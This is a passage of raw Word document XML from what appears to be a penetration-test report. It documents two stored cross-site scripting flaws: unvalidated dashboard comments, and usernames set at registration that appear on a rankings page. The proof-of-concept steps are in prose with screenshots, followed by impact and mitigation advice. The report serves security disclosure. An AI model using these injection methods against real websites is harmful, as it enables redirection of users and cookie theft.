        </w:rPr>
        <w:t xml:space="preserve"> attack. A malicious user can enter the main dashboard and add a comment the doesn’t go thorough any significant validation. The user then can insert a malicious XSS that will be inserted into the app's </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AD249B" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>database, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AD249B" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> will </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD249B" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>effect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD249B" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> any user that will enter the main dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C55BEAD" w14:textId="77777777" w:rsidR="00D34400" w:rsidRPr="00787602" w:rsidRDefault="00D34400" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Proof of concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1080C738" w14:textId="77777777" w:rsidR="00AD249B" w:rsidRPr="00F94EEA" w:rsidRDefault="00CE5FF7" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The attacker creates a legitimate user in the system, then enters to the main dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3767770D" w14:textId="77777777" w:rsidR="00CE5FF7" w:rsidRPr="00F94EEA" w:rsidRDefault="00CE5FF7" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48397139" wp14:editId="5EB96089">
            <wp:extent cx="5274310" cy="1865630"/>
            <wp:effectExtent l="0" t="0" r="254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5630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="174F010C" w14:textId="77777777" w:rsidR="00CE5FF7" w:rsidRPr="00F94EEA" w:rsidRDefault="00CE5FF7" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CE7DC3C" w14:textId="77777777" w:rsidR="00CE5FF7" w:rsidRPr="00F94EEA" w:rsidRDefault="00CE5FF7" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker can add comments, a simple check can show that there isn’t any validation on the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F8D072" w14:textId="77777777" w:rsidR="00CE5FF7" w:rsidRPr="00F94EEA" w:rsidRDefault="00CE5FF7" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08B956E4" wp14:editId="49472A9D">
            <wp:extent cx="3390900" cy="37338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3733800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65619FC5" w14:textId="77777777" w:rsidR="00CE5FF7" w:rsidRPr="00F94EEA" w:rsidRDefault="00CE5FF7" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A3AB54E" wp14:editId="494A5D3C">
            <wp:extent cx="2905125" cy="83820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838200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3B3A3B" w14:textId="161F1F62" w:rsidR="00CE5FF7" w:rsidRPr="00F94EEA" w:rsidRDefault="00CE5FF7" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The attacker then can insert a malicious script that will show up whenever a user enters the dashboard</w:t>
      </w:r>
      <w:r w:rsidR="00126A9F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1435D855" w14:textId="77777777" w:rsidR="009D2302" w:rsidRPr="00F94EEA" w:rsidRDefault="009D2302" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70B8E1C2" w14:textId="77777777" w:rsidR="00D34400" w:rsidRPr="00F94EEA" w:rsidRDefault="009D2302" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44E78FDA" wp14:editId="02867BDC">
            <wp:extent cx="5274310" cy="2489835"/>
            <wp:effectExtent l="0" t="0" r="254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9835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB9C81C" w14:textId="4303C28D" w:rsidR="00CE5FF7" w:rsidRPr="00F94EEA" w:rsidRDefault="00CE5FF7" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>We can see that the script</w:t>
      </w:r>
      <w:r w:rsidR="00305C8D" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> was inserted into the website's code</w:t>
      </w:r>
      <w:r w:rsidR="00126A9F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153EC519" w14:textId="77777777" w:rsidR="00305C8D" w:rsidRPr="00F94EEA" w:rsidRDefault="00305C8D" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C4A5C58" wp14:editId="4BC5895E">
            <wp:extent cx="5817035" cy="1542553"/>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66" cy="1576451"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="241C0B5A" w14:textId="77777777" w:rsidR="00305C8D" w:rsidRPr="00F94EEA" w:rsidRDefault="00305C8D" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62EC492B" w14:textId="77777777" w:rsidR="009D2302" w:rsidRPr="00F94EEA" w:rsidRDefault="00305C8D" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The alert message will then pop on the page as soon as a user enters the dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBFEFC8" w14:textId="77777777" w:rsidR="009D2302" w:rsidRPr="00F94EEA" w:rsidRDefault="009D2302" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7433AD31" wp14:editId="7D882D07">
            <wp:extent cx="4482740" cy="1789642"/>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149" cy="1802181"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="675E9A7B" w14:textId="77777777" w:rsidR="00305C8D" w:rsidRPr="00F94EEA" w:rsidRDefault="00305C8D" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>After that the user will be redirected to a malicious website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33593DD2" w14:textId="77777777" w:rsidR="00305C8D" w:rsidRPr="00F94EEA" w:rsidRDefault="00305C8D" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C346C09" wp14:editId="32219745">
            <wp:extent cx="5274310" cy="189484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4840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A572AA" w14:textId="77777777" w:rsidR="00C45389" w:rsidRPr="00F94EEA" w:rsidRDefault="00305C8D" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DB51199" wp14:editId="36710B20">
            <wp:extent cx="5274310" cy="2477770"/>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7770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="432CA146" w14:textId="77777777" w:rsidR="000F41DE" w:rsidRPr="00F94EEA" w:rsidRDefault="000F41DE" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2233D924" w14:textId="77777777" w:rsidR="00C45389" w:rsidRPr="00F94EEA" w:rsidRDefault="00D0700A" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>We can also see that the malicious code was implemented into the database as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1E0FCC" w14:textId="77777777" w:rsidR="000F41DE" w:rsidRPr="00F94EEA" w:rsidRDefault="000F41DE" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E50D728" w14:textId="77777777" w:rsidR="00C45389" w:rsidRPr="00F94EEA" w:rsidRDefault="00C45389" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29C49DB9" wp14:editId="76E3868A">
            <wp:extent cx="2118957" cy="1229592"/>
            <wp:effectExtent l="0" t="0" r="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198" cy="1238436"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5AEF66" w14:textId="77777777" w:rsidR="00C45389" w:rsidRPr="00F94EEA" w:rsidRDefault="00C45389" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="319EFC0A" w14:textId="77777777" w:rsidR="00C34744" w:rsidRPr="00787602" w:rsidRDefault="00C34744" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Business impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B37D956" w14:textId="77777777" w:rsidR="00D0700A" w:rsidRPr="00F94EEA" w:rsidRDefault="00D0700A" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Attackers can use that vulnerability in order to redirect users to a malicious website (possibly to a fake website so they can steal their login details), steal the website's cookie, upload malwares unto the website, insert malicious scripts etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68997994" w14:textId="77777777" w:rsidR="00DA1130" w:rsidRPr="00787602" w:rsidRDefault="00DA1130" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Mitigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DA0B97" w14:textId="77777777" w:rsidR="00D0700A" w:rsidRPr="00F94EEA" w:rsidRDefault="00D0700A" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Create validation on all user inputs in the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FB7E1D" w14:textId="77777777" w:rsidR="00D0700A" w:rsidRPr="00F94EEA" w:rsidRDefault="00D0700A" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Prevent certain characters such as /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>\(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>){}[]&lt;&gt; and words such as "script", "alert" etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08220BB6" w14:textId="77777777" w:rsidR="00D0700A" w:rsidRPr="00F94EEA" w:rsidRDefault="00D0700A" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Create sanitations on user's inputs. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D27EB2F" w14:textId="77777777" w:rsidR="00D0700A" w:rsidRPr="00F94EEA" w:rsidRDefault="00D0700A" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Usage of safe 'response headers' in order to prevent the implementation of malicious scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F76280B" w14:textId="77777777" w:rsidR="00936539" w:rsidRPr="00F94EEA" w:rsidRDefault="00D0700A" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Usage of 'CSP' in order to minimize the likelihood of XSS attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EAE9CB" w14:textId="3E7D32B9" w:rsidR="002E4E53" w:rsidRPr="00787602" w:rsidRDefault="002E4E53" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:lastRenderedPageBreak/>
        <w:t>Store</w:t>
      </w:r>
      <w:r w:rsidR="00544A3E">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00787602">
        <w:t xml:space="preserve"> cross-site #2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5917C246" w14:textId="77777777" w:rsidR="002E4E53" w:rsidRPr="00787602" w:rsidRDefault="002E4E53" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F84D3BD" w14:textId="77777777" w:rsidR="002E4E53" w:rsidRPr="00F94EEA" w:rsidRDefault="002E4E53" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The team also found</w:t>
      </w:r>
      <w:r w:rsidR="00E96F80" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that an attacker who's </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E96F80" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E96F80" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> yet a legitimate user can create a stored XSS attack when creating a user in the system. By entering a malicious script instead of a username, the XSS will show up to anyone who enters the 'Ranking' page, which shows the rankings of all users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BBF179" w14:textId="77777777" w:rsidR="00E96F80" w:rsidRPr="00787602" w:rsidRDefault="00E96F80" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Proof of concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362B7384" w14:textId="57C0B753" w:rsidR="00E96F80" w:rsidRPr="00126A9F" w:rsidRDefault="00E96F80" w:rsidP="00126A9F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00126A9F">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The attacker will enter the 'sign in' link in the 'login' page in order to create a new user. Instead of a normal name, an attacker can enter a malicious script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFB7083" w14:textId="77777777" w:rsidR="00E96F80" w:rsidRPr="00F94EEA" w:rsidRDefault="00E96F80" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
